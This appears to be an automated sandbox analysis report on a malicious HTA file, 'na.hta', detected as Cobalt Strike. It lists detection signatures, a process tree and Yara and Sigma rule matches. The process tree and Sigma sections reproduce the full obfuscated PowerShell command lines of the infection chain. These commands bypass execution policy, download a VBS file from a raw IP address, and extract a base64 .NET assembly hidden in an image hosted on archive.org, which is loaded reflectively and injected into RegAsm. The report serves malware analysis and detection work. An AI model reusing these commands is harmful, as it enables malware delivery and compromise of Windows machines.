Edit tour

Windows Analysis Report
na.hta

Overview

General Information

Sample name:	na.hta
Analysis ID:	1533032
MD5:	02db2924d9d28415909466fd83d98bfb
SHA1:	131f37687d5f92227dbf8db85537d8d588ba4c67
SHA256:	63460bd959db60a47de9dfbc64c58abd983af187b29d7732987928c56a83a2e1
Tags:	htauser-abuse_ch
Infos:

Detection

Cobalt Strike

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Cobalt Strike Beacon

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Powershell decode and execute

Yara detected Powershell download and execute

AI detected suspicious sample

Bypasses PowerShell execution policy

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Obfuscated command line found

PowerShell case anomaly found

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: PowerShell Base64 Encoded Invoke Keyword

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: WScript or CScript Dropper

Suspicious command line found

Suspicious execution chain found

Suspicious powershell command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript starts Powershell (via cmd or directly)

Compiles C# or VB.Net code

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

mshta.exe (PID: 4304 cmdline: mshta.exe "C:\Users\user\Desktop\na.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

cmd.exe (PID: 5320 cmdline: "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6720 cmdline: PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

csc.exe (PID: 2212 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

cvtres.exe (PID: 6948 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES15CB.tmp" "c:\Users\user\AppData\Local\Temp\0rfajt3l\CSC378EC5CD3A3F432FA3C6C9642D503F33.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

wscript.exe (PID: 768 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS" MD5: FF00E0480075B095948000BDC66E81F0)

powershell.exe (PID: 6548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3092 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: powershell.exe PID: 6548	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x4b63c:$b3: ::UTF8.GetString( 0x54398:$b3: ::UTF8.GetString( 0x54a9e:$b3: ::UTF8.GetString( 0x582e0:$b3: ::UTF8.GetString( 0x591c3:$b3: ::UTF8.GetString( 0x5ac12:$b3: ::UTF8.GetString( 0x76e87:$b3: ::UTF8.GetString( 0x82ec2:$b3: ::UTF8.GetString( 0x82f72:$b3: ::UTF8.GetString( 0x83654:$b3: ::UTF8.GetString( 0xb566c:$b3: ::UTF8.GetString( 0xb5d75:$b3: ::UTF8.GetString( 0xb6dbe:$b3: ::UTF8.GetString( 0xb7636:$b3: ::UTF8.GetString( 0xb7db2:$b3: ::UTF8.GetString( 0xb8667:$b3: ::UTF8.GetString( 0xb8fe9:$b3: ::UTF8.GetString( 0xb9a10:$b3: ::UTF8.GetString( 0xba50f:$b3: ::UTF8.GetString( 0xbbef1:$b3: ::UTF8.GetString( 0xc3396:$b3: ::UTF8.GetString(
Process Memory Space: powershell.exe PID: 3092	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 3092	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xe3dd6:$b2: ::FromBase64String( 0xffc0d:$b2: ::FromBase64String( 0x10107c:$b2: ::FromBase64String( 0x888:$b3: ::UTF8.GetString( 0x29424:$b3: ::UTF8.GetString( 0x2a621:$b3: ::UTF8.GetString( 0x2a670:$b3: ::UTF8.GetString( 0x2b12d:$b3: ::UTF8.GetString( 0x2b8a8:$b3: ::UTF8.GetString( 0x2bda8:$b3: ::UTF8.GetString( 0x2f551:$b3: ::UTF8.GetString( 0x2fa51:$b3: ::UTF8.GetString( 0x35211:$b3: ::UTF8.GetString( 0x37ab7:$b3: ::UTF8.GetString( 0x387d3:$b3: ::UTF8.GetString( 0x38ce1:$b3: ::UTF8.GetString( 0x3b3d1:$b3: ::UTF8.GetString( 0x3b935:$b3: ::UTF8.GetString( 0x3ba2b:$b3: ::UTF8.GetString( 0x477fa:$b3: ::UTF8.GetString( 0x47c8b:$b3: ::UTF8.GetString(

Other

Source	Rule	Description	Author	Strings
amsi32_6720.amsi.csv	JoeSecurity_PowershellDecodeAndExecute	Yara detected Powershell decode and execute	Joe Security
amsi32_3092.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3Nl

Sigma detected: Potential PowerShell Command Line Obfuscation

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSA

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 